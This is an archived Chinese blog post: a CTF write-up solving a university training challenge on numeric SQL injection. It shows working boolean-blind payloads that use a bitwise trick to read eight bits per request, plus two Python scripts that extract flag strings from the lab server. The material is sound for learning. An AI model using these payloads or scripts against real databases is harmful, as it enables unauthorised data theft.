<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/icon512.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/icon128.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/icon32.png">
  <link rel="mask-icon" href="/images/icon128.png" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"cyrus28214.top","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前言 继续学习CTF，记录一下第一道Web。 题目  作为教程性质的题目，这道题几乎把什么都写出来了，连表名flag_is_here都知道了，真好。 题目已经告诉我们表名，并且给出了注入类型属于数字而不是字符串，因此不需要加单引号。 简单试一下 1 OR 1 &#x3D; 1 发现给出了 0-7 全部的题目。">
<meta property="og:type" content="article">
<meta property="og:title" content="ZJU校巴-SQL_injection解题记录">
<meta property="og:url" content="http://cyrus28214.top/post/fda98bd4456d/index.html">
<meta property="og:site_name" content="Cyrus&#39; Blog">
<meta property="og:description" content="前言 继续学习CTF，记录一下第一道Web。 题目  作为教程性质的题目，这道题几乎把什么都写出来了，连表名flag_is_here都知道了，真好。 题目已经告诉我们表名，并且给出了注入类型属于数字而不是字符串，因此不需要加单引号。 简单试一下 1 OR 1 &#x3D; 1 发现给出了 0-7 全部的题目。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cyrus28214.top/images/s/6523f805c458853aef62f951.jpg">
<meta property="article:published_time" content="2023-10-14T12:38:23.000Z">
<meta property="article:modified_time" content="2023-12-04T15:05:20.566Z">
<meta property="article:author" content="Cyrus28214">
<meta property="article:tag" content="题解">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="信息安全">
<meta property="article:tag" content="ZJU校巴">
<meta property="article:tag" content="网络安全">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cyrus28214.top/images/s/6523f805c458853aef62f951.jpg">


<link rel="canonical" href="http://cyrus28214.top/post/fda98bd4456d/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://cyrus28214.top/post/fda98bd4456d/","path":"post/fda98bd4456d/","title":"ZJU校巴-SQL_injection解题记录"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>ZJU校巴-SQL_injection解题记录 | Cyrus' Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Cyrus' Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Think twice, code once.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">2.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Cyrus28214"
      src="/images/icon512.png">
  <p class="site-author-name" itemprop="name">Cyrus28214</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">48</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">76</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Cyrus28214" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Cyrus28214" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-user-group fa-fw"></i>
          友情链接
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://herveyb3b4.github.io/" title="https:&#x2F;&#x2F;herveyb3b4.github.io" rel="noopener" target="_blank">Hervey's Blog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://dicsec.github.io/" title="https:&#x2F;&#x2F;dicsec.github.io&#x2F;" rel="noopener" target="_blank">DSC's Blog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://qs-sg.github.io/my-world/" title="https:&#x2F;&#x2F;qs-sg.github.io&#x2F;my-world&#x2F;" rel="noopener" target="_blank">浅碎时光 の 小世界</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://csfufu.life/" title="https:&#x2F;&#x2F;csfufu.life&#x2F;" rel="noopener" target="_blank">fufu酱のNoteBook</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://cyrus28214.top/post/fda98bd4456d/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/icon512.png">
      <meta itemprop="name" content="Cyrus28214">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cyrus' Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="ZJU校巴-SQL_injection解题记录 | Cyrus' Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ZJU校巴-SQL_injection解题记录
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-10-14 20:38:23" itemprop="dateCreated datePublished" datetime="2023-10-14T20:38:23+08:00">2023-10-14</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="前言">前言</h1>
<p>继续学习CTF，记录一下第一道Web。</p>
<h1 id="题目">题目</h1>
<p><img
src="https://cyrus28214.top/images/s/6523a836c458853aef484b4c.jpg" /></p>
<p>作为教程性质的题目，这道题几乎把什么都写出来了，连表名flag_is_here都知道了，真好。</p>
<p>题目已经告诉我们表名，并且给出了注入类型属于数字而不是字符串，因此不需要加单引号。</p>
<p>简单试一下 <code>1 OR 1 = 1</code> 发现给出了 0-7 全部的题目。</p>
<span id="more"></span>
<p><img
src="https://cyrus28214.top/images/s/6523a8b4c458853aef4860ed.jpg" /></p>
<p>再试一下
<code>1 AND EXISTS(SELECT * FROM flag_is_here)</code>，返回了第一条数据，题目果然没骗我。</p>
<p>猜测列名为 “flag” ，先手注
<code>1 AND EXISTS(SELECT flag FROM flag_is_here)</code>
，发现有这个列，居然一次就猜对了XD。</p>
<p>然后试一下有几行
<code>1 AND (SELECT count(*) FROM flag_is_here) = 1</code>，不行，居然不止一个。再来试试2个，发现成功了，有两行flag。</p>
<p>题目不允许使用 UNION ，那么只能考虑布尔盲注（Boolean-based Blind
Injection）了，注意到这个题目的输出其实并不是 True or False，而是八个
bit 的数据，一共 256 种情况，可以利用这个减少尝试的次数。</p>
<p>现在想要获取第一个flag的长度，为了充分利用这 8 bit 的数据，使用
<code>8 OR (SELECT LENGTH(flag) FROM flag_is_here LIMIT 1) &amp; (1 &lt;&lt; id)</code>
，发现返回了以下界面：</p>
<p><img
src="https://cyrus28214.top/images/s/6523b077c458853aef4b144c.jpg" /></p>
<p>二进制的1/2/4/5位为1，而其他位均为0，0b00110110转十进制就是54，flag有54位。但是还要再验证一下，因为假如flag长度大于255（虽然不太可能），这个方法返回的数据就是错误的。</p>
<p><code>1 OR (SELECT LENGTH(flag) FROM flag_is_here LIMIT 1) = 54</code>，返回的页面验证了我的猜测。</p>
<p>flag长度54位，ASCII码范围0-127，每次可以试出一个字符。举个例子，比如说我想知道第五个字符，就使用
<code>8 OR (SELECT ASCII(SUBSTR(flag, 5, 1)) FROM flag_is_here LIMIT 1) &amp; (1 &lt;&lt; id)</code>，页面返回以下结果：</p>
<p><img
src="https://cyrus28214.top/images/s/6523f6d4c458853aef62d6cf.jpg" /></p>
<p>则第五个字符的0/1/2/4/5/6位为1，其他位为0，0b01110111 =
119，查阅ASCII码表，发现对应的字符是小写英文字母“w”。</p>
<figure>
<img src="https://cyrus28214.top/images/s/6523f805c458853aef62f951.jpg"
alt="ASCII码表" />
<figcaption aria-hidden="true">ASCII码表</figcaption>
</figure>
<p>当然可以手动一个个试出54位flag，但是还是写代码来得快一点，上代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> lxml <span class="keyword">import</span> etree <span class="comment"># 引入lxml包，便于使用XPath解析HTML</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://10.214.160.13:10002/&quot;</span></span><br><span class="line">flag_length = <span class="number">54</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">array2Byte</span>(<span class="params">array</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    将数组转化为一个0-255的数字</span></span><br><span class="line"><span class="string">    e.g. [0, 1, 2, 4, 5, 6] -&gt; 119</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    b = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> array:</span><br><span class="line">        b |= <span class="number">1</span> &lt;&lt; i</span><br><span class="line">    <span class="keyword">return</span> b</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getTexts</span>(<span class="params">SQLquery</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    获取请求的正文部分，再利用XPath提取出所有&lt;body&gt;元素里的文本。</span></span><br><span class="line"><span class="string">    去除全部空白的文本，和每段文本的前后空白部分。</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    res = requests.get(url, params=&#123;<span class="string">&quot;questionid&quot;</span>: SQLquery&#125;) </span><br><span class="line">    html = res.text</span><br><span class="line">    texts = etree.HTML(html).xpath(<span class="string">&#x27;//body/text()&#x27;</span>)</span><br><span class="line">    texts = [x.strip() <span class="keyword">for</span> x <span class="keyword">in</span> texts <span class="keyword">if</span> <span class="keyword">not</span> x.isspace()]</span><br><span class="line">    <span class="keyword">return</span> texts</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, flag_length + <span class="number">1</span>):</span><br><span class="line">    texts = getTexts(<span class="string">f&quot;8 OR (SELECT ASCII(SUBSTR(flag, <span class="subst">&#123;i&#125;</span>, 1)) FROM flag_is_here LIMIT 1) &amp; (1 &lt;&lt; id)&quot;</span>)</span><br><span class="line">    <span class="comment"># 构造SQL注入字符串，先取flag的第i个字符，再转化为ASCII码，二进制且运算提取每一位是0还是1，如果是1，则页面会返回相应序号的文本</span></span><br><span class="line"></span><br><span class="line">    array = [<span class="built_in">int</span>(x[<span class="number">0</span>]) <span class="keyword">for</span> x <span class="keyword">in</span> texts] <span class="comment"># 获取每个文本的第一个字符并转为数字，也就是序号0-7</span></span><br><span class="line">    ch = <span class="built_in">chr</span>(array2Byte(array)) <span class="comment"># 转ASCII码为字符</span></span><br><span class="line">    <span class="built_in">print</span>(ch, end=<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>运行代码后就获得了flag。</p>
<p>我还是有点在意另一行flag里面是啥，于是把另一行的内容也跑出来了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> lxml <span class="keyword">import</span> etree</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://10.214.160.13:10002/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getByte</span>(<span class="params">query</span>):</span><br><span class="line">    res = requests.get(url, params=&#123;<span class="string">&quot;questionid&quot;</span>: query&#125;) </span><br><span class="line">    html = res.text</span><br><span class="line">    texts = etree.HTML(html).xpath(<span class="string">&#x27;//body/text()&#x27;</span>)</span><br><span class="line">    texts = [x.strip() <span class="keyword">for</span> x <span class="keyword">in</span> texts <span class="keyword">if</span> <span class="keyword">not</span> x.isspace()]</span><br><span class="line">    array = [<span class="built_in">int</span>(x[<span class="number">0</span>]) <span class="keyword">for</span> x <span class="keyword">in</span> texts]</span><br><span class="line">    b = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> array:</span><br><span class="line">        b |= <span class="number">1</span> &lt;&lt; i</span><br><span class="line">    <span class="keyword">return</span> b</span><br><span class="line"></span><br><span class="line">flag_length = getByte(<span class="string">&quot;8 OR (SELECT LENGTH(flag) FROM flag_is_here LIMIT 1,1) &amp; (1 &lt;&lt; id)&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(flag_length)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, flag_length + <span class="number">1</span>):</span><br><span class="line">    ch = <span class="built_in">chr</span>(getByte(<span class="string">f&quot;8 OR (SELECT ASCII(SUBSTR(flag, <span class="subst">&#123;i&#125;</span>, 1)) FROM flag_is_here LIMIT 1) &amp; (1 &lt;&lt; id)&quot;</span>))</span><br><span class="line">    <span class="built_in">print</span>(ch, end=<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>发现只是截取了前35个字符的不完整flag，没有什么彩蛋。</p>
<h1 id="总结">总结</h1>
<p>这个题目很有趣的地方是页面可以返回一个字节的数据，这样一个长度54的flag只需要测54次就行了。当然不这么做也是可以的，毕竟这是CTF又不是需要程序在给定时间内返回结果的算法竞赛，每次获得
1 bit 的 true or false 数据或者手动注入都可以做出来。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%A2%98%E8%A7%A3/" rel="tag"># 题解</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" rel="tag"># 信息安全</a>
              <a href="/tags/ZJU%E6%A0%A1%E5%B7%B4/" rel="tag"># ZJU校巴</a>
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/post/4fc4538d6849/" rel="prev" title="Linux下的inode与软硬链接">
                  <i class="fa fa-chevron-left"></i> Linux下的inode与软硬链接
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/post/552cf0551fbf/" rel="next" title="SymPy学习笔记（四）化简">
                  SymPy学习笔记（四）化简 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cyrus28214</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script size="300" alpha="0.6" zIndex="-1" src="https://cdnjs.cloudflare.com/ajax/libs/ribbon.js/1.0.2/ribbon.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
